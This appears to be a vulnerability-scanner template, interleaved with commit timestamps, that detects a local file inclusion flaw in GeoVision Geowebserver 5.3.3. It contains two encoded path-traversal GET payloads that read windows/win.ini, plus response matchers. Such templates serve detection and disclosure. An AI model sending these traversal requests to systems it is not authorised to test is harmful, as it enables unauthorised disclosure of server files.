2021-08-17 22:20:45 +00:00
id : geowebserver-lfi
info :
2022-07-27 20:17:31 +00:00
name : GeoVision Geowebserver 5.3.3 - Local File Inclusion
2021-08-17 22:20:45 +00:00
author : madrobot
severity : high
2022-07-27 20:17:31 +00:00
description : GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
2022-07-27 20:17:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2021-08-17 22:20:45 +00:00
tags : geowebserver,lfi
requests :
- method : GET
path :
2021-08-17 22:24:30 +00:00
- "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini"
2021-08-17 22:20:45 +00:00
- "{{BaseURL}}/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa"
matchers-condition : and
matchers :
2021-08-18 10:48:12 +00:00
- type : word
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2021-08-17 22:20:45 +00:00
part : body
- type : status
status :
- 200
2022-07-27 20:17:31 +00:00
# Enhanced by mp on 2022/07/27